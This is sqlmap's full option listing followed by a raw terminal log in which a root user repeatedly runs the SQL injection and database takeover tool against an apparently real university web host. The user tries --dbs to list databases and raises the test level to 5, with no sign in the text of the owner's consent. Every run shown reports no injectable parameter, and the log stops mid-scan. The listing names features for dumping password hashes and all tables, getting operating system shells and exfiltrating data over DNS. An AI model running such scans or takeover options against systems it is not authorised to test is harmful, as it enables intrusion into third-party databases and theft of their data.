
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:33:19

Usage: python ./sqlmap.py [options]

Options:
    -h, --help            Show basic help message and exit
    -hh                   Show advanced help message and exit
    -v VERBOSE            Verbosity level: 0-6 (default 1)

Target:
  At least one of these options has to be specified to set the source to get target urls from

    -d DIRECT             Direct connection to the database
    -u URL, --url=URL     Target url
    -l LOGFILE            Parse targets from Burp or WebScarab proxy logs
    -m BULKFILE           Scan multiple targets enlisted in a given textual file
    -r REQUESTFILE        Load HTTP request from a file
    -g GOOGLEDORK         Process Google dork results as target urls
    -c CONFIGFILE         Load options from a configuration INI file

Request:
  These options can be used to specify how to connect to the target url

    --data=DATA           Data string to be sent through POST
    --param-del=PDEL      Character used for splitting parameter values
    --cookie=COOKIE       HTTP Cookie header
    --load-cookies=LOC    File containing cookies in Netscape/wget format
    --cookie-urlencode    URL Encode generated cookie injections
    --drop-set-cookie     Ignore Set-Cookie header from response
    --user-agent=AGENT    HTTP User-Agent header
    --random-agent        Use randomly selected HTTP User-Agent header
    --randomize=RPARAM    Randomly change value for given parameter(s)
    --force-ssl           Force usage of SSL/HTTPS requests
    --host=HOST           HTTP Host header
    --referer=REFERER     HTTP Referer header
    --headers=HEADERS     Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=ATYPE     HTTP authentication type (Basic, Digest or NTLM)
    --auth-cred=ACRED     HTTP authentication credentials (name:password)
    --auth-cert=ACERT     HTTP authentication certificate (key_file,cert_file)
    --proxy=PROXY         Use a HTTP proxy to connect to the target url
    --proxy-cred=PCRED    HTTP proxy authentication credentials (name:password)
    --ignore-proxy        Ignore system default HTTP proxy
    --delay=DELAY         Delay in seconds between each HTTP request
    --timeout=TIMEOUT     Seconds to wait before timeout connection (default 30)
    --retries=RETRIES     Retries when the connection timeouts (default 3)
    --scope=SCOPE         Regexp to filter targets from provided proxy log
    --safe-url=SAFURL     Url address to visit frequently during testing
    --safe-freq=SAFREQ    Test requests between two visits to a given safe url
    --skip-urlencode      Skip URL encoding of POST data
    --eval=EVALCODE       Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

Optimization:
  These options can be used to optimize the performance of sqlmap

    -o                    Turn on all optimization switches
    --predict-output      Predict common queries output
    --keep-alive          Use persistent HTTP(s) connections
    --null-connection     Retrieve page length without actual HTTP response body
    --threads=THREADS     Max number of concurrent HTTP(s) requests (default 1)

Injection:
  These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER      Testable parameter(s)
    --dbms=DBMS           Force back-end DBMS to this value
    --os=OS               Force back-end DBMS operating system to this value
    --invalid-bignum      Use big numbers for invalidating values
    --invalid-logical     Use logical operations for invalidating values
    --no-cast             Turn off payload casting mechanism
    --prefix=PREFIX       Injection payload prefix string
    --suffix=SUFFIX       Injection payload suffix string
    --skip=SKIP           Skip testing for given parameter(s)
    --tamper=TAMPER       Use given script(s) for tampering injection data

Detection:
  These options can be used to specify how to parse and compare page content from HTTP responses when using blind SQL injection technique

    --level=LEVEL         Level of tests to perform (1-5, default 1)
    --risk=RISK           Risk of tests to perform (0-3, default 1)
    --string=STRING       String to match when query is evaluated to True
    --regexp=REGEXP       Regexp to match when query is evaluated to True
    --code=CODE           HTTP code to match when query is evaluated to True
    --text-only           Compare pages based only on the textual content
    --titles              Compare pages based only on their titles

Techniques:
  These options can be used to tweak testing of specific SQL injection techniques

    --technique=TECH      SQL injection techniques to test for (default "BEUST")
    --time-sec=TIMESEC    Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS    Range of columns to test for UNION query SQL injection
    --union-char=UCHAR    Character to use for bruteforcing number of columns
    --dns-domain=DNAME    Domain name used for DNS exfiltration attack

Fingerprint:
    -f, --fingerprint     Perform an extensive DBMS version fingerprint

Enumeration:
  These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements

    -b, --banner          Retrieve DBMS banner
    --current-user        Retrieve DBMS current user
    --current-db          Retrieve DBMS current database
    --is-dba              Detect if the DBMS current user is DBA
    --users               Enumerate DBMS users
    --passwords           Enumerate DBMS users password hashes
    --privileges          Enumerate DBMS users privileges
    --roles               Enumerate DBMS users roles
    --dbs                 Enumerate DBMS databases
    --tables              Enumerate DBMS database tables
    --columns             Enumerate DBMS database table columns
    --schema              Enumerate DBMS schema
    --count               Retrieve number of entries for table(s)
    --dump                Dump DBMS database table entries
    --dump-all            Dump all DBMS databases tables entries
    --search              Search column(s), table(s) and/or database name(s)
    -D DB                 DBMS database to enumerate
    -T TBL                DBMS database table to enumerate
    -C COL                DBMS database table column to enumerate
    -U USER               DBMS user to enumerate
    --exclude-sysdbs      Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART    First query output entry to retrieve
    --stop=LIMITSTOP      Last query output entry to retrieve
    --first=FIRSTCHAR     First query output word character to retrieve
    --last=LASTCHAR       Last query output word character to retrieve
    --sql-query=QUERY     SQL statement to be executed
    --sql-shell           Prompt for an interactive SQL shell

Brute force:
  These options can be used to run brute force checks

    --common-tables       Check existence of common tables
    --common-columns      Check existence of common columns

User-defined function injection:
  These options can be used to create custom user-defined functions

    --udf-inject          Inject custom user-defined functions
    --shared-lib=SHLIB    Local path of the shared library

File system access:
  These options can be used to access the back-end database management system underlying file system

    --file-read=RFILE     Read a file from the back-end DBMS file system
    --file-write=WFILE    Write a local file on the back-end DBMS file system
    --file-dest=DFILE     Back-end DBMS absolute filepath to write to

Operating system access:
  These options can be used to access the back-end database management system underlying operating system

    --os-cmd=OSCMD        Execute an operating system command
    --os-shell            Prompt for an interactive operating system shell
    --os-pwn              Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay         One click prompt for an OOB shell, meterpreter or VNC
    --os-bof              Stored procedure buffer overflow exploitation
    --priv-esc            Database process' user privilege escalation
    --msf-path=MSFPATH    Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH    Remote absolute path of temporary files directory

Windows registry access:
  These options can be used to access the back-end database management system Windows registry

    --reg-read            Read a Windows registry key value
    --reg-add             Write a Windows registry key value data
    --reg-del             Delete a Windows registry key value
    --reg-key=REGKEY      Windows registry key
    --reg-value=REGVAL    Windows registry key value
    --reg-data=REGDATA    Windows registry key value data
    --reg-type=REGTYPE    Windows registry key value type

General:
  These options can be used to set some general working parameters

    -t TRAFFICFILE        Log all HTTP traffic into a textual file
    --batch               Never ask for user input, use the default behaviour
    --charset=CHARSET     Force character encoding used for data retrieval
    --check-tor           Check to see if Tor is used properly
    --crawl=CRAWLDEPTH    Crawl the website starting from the target url
    --csv-del=CSVDEL      Delimiting character used in CSV output (default ",")
    --dbms-cred=DCRED     DBMS authentication credentials (user:password)
    --eta                 Display for each output the estimated time of arrival
    --flush-session       Flush session files for current target
    --forms               Parse and test forms on target url
    --fresh-queries       Ignores query results stored in session file
    --hex                 Uses DBMS hex function(s) for data retrieval
    --output-dir=ODIR     Custom output directory path
    --parse-errors        Parse and display DBMS error messages from responses
    --replicate           Replicate dumped data into a sqlite3 database
    --save                Save options to a configuration INI file
    --tor                 Use Tor anonymity network
    --tor-port=TORPORT    Set Tor proxy port other than default
    --tor-type=TORTYPE    Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
    --update              Update sqlmap

Miscellaneous:
    -z MNEMONICS          Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --beep                Sound alert when SQL injection found
    --check-payload       Offline WAF/IPS/IDS payload detection testing
    --check-waf           Check for existence of WAF/IPS/IDS protection
    --cleanup             Clean up the DBMS by sqlmap specific UDF and tables
    --dependencies        Check for missing sqlmap dependencies
    --disable-hash        Disable password hash cracking mechanism
    --disable-like        Disable LIKE search of identificator names
    --gpage=GOOGLEPAGE    Use Google dork results from specified page number
    --mobile              Imitate smartphone through HTTP User-Agent header
    --page-rank           Display page rank (PR) for Google dork results
    --purge-output        Safely remove all content from output directory
    --smart               Conduct through tests only if positive heuristic(s)
    --test-filter=TSTF    Select tests by payloads and/or titles (e.g. ROW)
    --wizard              Simple wizard interface for beginner users

[*] shutting down at 06:33:19 root@bt:/pentest/database/sqlmap# python sqlmap.py -u www.ucka.veleri.hr/~skis/r epozitorij sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:35:20 [06:35:24] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:35:35] [CRITICAL] host 'www.ucka.veleri.hr' does not exist [*] shutting down at 06:35:35 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:35:47 [06:35:47] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:35:50] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? 
[Y/n] y [06:35:58] [INFO] heuristics detected web page charset 'ascii' [06:35:58] [INFO] testing if the url is stable, wait a few seconds [06:35:59] [WARNING] URI parameter '#1*' appears to be not dynamic [06:35:59] [WARNING] reflective value(s) found and filtering out [06:35:59] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:35:59] [INFO] testing for SQL injection on URI parameter '#1*' [06:35:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:36:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:36:05] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:36:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:36:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:36:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:36:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[06:36:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:36:10] [INFO] testing 'Oracle AND time-based blind' [06:36:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:36:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:36:17] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:36:22] [WARNING] URI parameter '#1*' is not injectable [06:36:22] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:36:22] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 141 times [*] shutting down at 06:36:22 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:38:55 [06:38:55] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:38:57] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? 
[Y/n] y [06:39:01] [INFO] heuristics detected web page charset 'ascii' [06:39:01] [INFO] testing if the url is stable, wait a few seconds [06:39:02] [WARNING] URI parameter '#1*' appears to be not dynamic [06:39:02] [WARNING] reflective value(s) found and filtering out [06:39:02] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:39:02] [INFO] testing for SQL injection on URI parameter '#1*' [06:39:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:39:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:39:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:39:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:39:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:39:05] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:39:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:39:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:39:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:39:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:39:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[06:39:09] [INFO] testing 'Oracle AND time-based blind' [06:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:39:14] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:39:21] [WARNING] URI parameter '#1*' is not injectable [06:39:21] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:39:21] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 142 times [*] shutting down at 06:39:21 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:51:21 [06:51:21] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:51:40] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? 
[Y/n] y [06:51:47] [INFO] heuristics detected web page charset 'ascii' [06:51:47] [INFO] testing if the url is stable, wait a few seconds [06:51:48] [WARNING] URI parameter '#1*' appears to be not dynamic [06:51:48] [WARNING] reflective value(s) found and filtering out [06:51:48] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:51:48] [INFO] testing for SQL injection on URI parameter '#1*' [06:51:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:51:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:51:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:51:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:51:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:51:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:51:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:51:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:51:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:51:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:51:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:51:58] [INFO] testing 'Oracle AND time-based blind'

[06:51:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:52:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:52:03] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:52:09] [WARNING] URI parameter '#1*' is not injectable [06:52:09] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:52:09] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 141 times [*] shutting down at 06:52:09 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:53:54 [06:53:54] [INFO] testing connection to the target url [06:53:54] [INFO] testing if the url is stable, wait a few seconds [06:53:55] [INFO] url is stable [06:53:55] [CRITICAL] no parameter(s) found for testing in the provided data (e. g. GET parameter 'id' in 'www.site.com/index.php?id=1') [*] shutting down at 06:53:55 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp id=1 --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:57:18 [06:57:19] [INFO] testing connection to the target url [06:57:19] [INFO] testing if the url is stable, wait a few seconds [06:57:20] [INFO] url is stable [06:57:20] [CRITICAL] no parameter(s) found for testing in the provided data (e. g. GET parameter 'id' in 'www.site.com/index.php?id=1') [*] shutting down at 06:57:20 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --dbs

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:57:34

[06:57:34] [INFO] testing connection to the target url
[06:57:34] [INFO] testing if the url is stable, wait a few seconds
[06:57:35] [INFO] url is stable
[06:57:35] [INFO] testing if GET parameter 'id' is dynamic
[06:57:35] [WARNING] GET parameter 'id' appears to be not dynamic
[06:57:35] [WARNING] reflective value(s) found and filtering out
[06:57:35] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[06:57:35] [INFO] testing for SQL injection on GET parameter 'id'

[06:57:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:57:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:57:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:57:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:57:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:57:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:57:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:57:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:57:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:57:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:57:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:57:47] [INFO] testing 'Oracle AND time-based blind' [06:57:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:57:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:57:58] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:58:08] [WARNING] GET parameter 'id' is not injectable [06:58:08] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [*] shutting down at 06:58:08 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --level sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:58:30

Usage: python sqlmap.py [options] sqlmap.py: error: --level option requires an argument [*] shutting down at 06:58:30 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --level 5 sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:58:41 [06:58:41] [INFO] testing connection to the target url [06:58:41] [INFO] testing if the url is stable, wait a few seconds [06:58:42] [INFO] url is stable [06:58:42] [INFO] testing if GET parameter 'id' is dynamic [06:58:42] [WARNING] GET parameter 'id' appears to be not dynamic [06:58:42] [WARNING] reflective value(s) found and filtering out [06:58:42] [WARNING] heuristic test shows that GET parameter 'id' might not be i njectable [06:58:42] [INFO] testing for SQL injection on GET parameter 'id' [06:58:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:59:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS QL comment)' [06:59:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen eric comment)' [06:59:42] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (R LIKE)' [07:00:01] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig inal value)' [07:00:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [07:00:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT original value)' [07:00:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i nt - original value)' [07:00:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' 
[07:00:03] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace ( original value)' [07:00:03] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [07:00:04] [INFO] testing 'Oracle boolean-based blind - Parameter replace (origi nal value)' [07:00:04] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl ace (original value)' [07:00:04] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (or iginal value)' [07:00:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses' [07:00:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses (original value)'

[07:00:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[07:00:06] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[07:00:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[07:00:07] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
[07:00:07] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses'
[07:00:07] [INFO] testing 'MySQL stacked conditional-error blind queries'
[07:00:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[07:00:39] [INFO] testing 'PostgreSQL stacked conditional-error blind queries'
[07:00:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:00:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:01:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[07:01:10] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[07:01:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:01:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[07:01:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:01:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:01:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)'
[07:01:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)'
[07:01:43] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[07:01:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[07:01:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:01:47] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:01:47] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[07:01:47] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[07:01:47] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[07:01:47] [INFO] testing 'Oracle error-based - Parameter replace'
[07:01:47] [INFO] testing 'Firebird error-based - Parameter replace'
[07:01:48] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[07:01:48] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[07:01:48] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[07:01:48] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY clauses'
[07:01:48] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[07:01:48] [INFO] testing 'Oracle error-based - GROUP BY and ORDER BY clauses'
[07:01:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:01:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[07:01:56] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'

[07:02:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[07:02:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[07:02:13] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[07:02:19] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[07:02:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:02:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[07:02:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:02:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[07:02:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[07:02:50] [INFO] testing 'Oracle AND time-based blind'
[07:02:54] [INFO] testing 'Oracle AND time-based blind (comment)'
[07:03:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:03:46] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[07:04:35] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[07:05:24] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[07:06:09] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[07:07:01] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[07:07:57] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[07:09:07] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[07:10:03] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[07:11:05] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[07:12:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:12:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
[07:13:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[07:14:15] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[07:15:06] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[07:16:01] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[07:16:47] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[07:17:42] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[07:18:38] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[07:19:36] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[07:20:42] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[07:21:33] [WARNING] GET parameter 'id' is not injectable
[07:21:33] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[07:21:33] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[07:21:33] [INFO] User-Agent parameter 'User-Agent' is dynamic
[07:21:33] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable
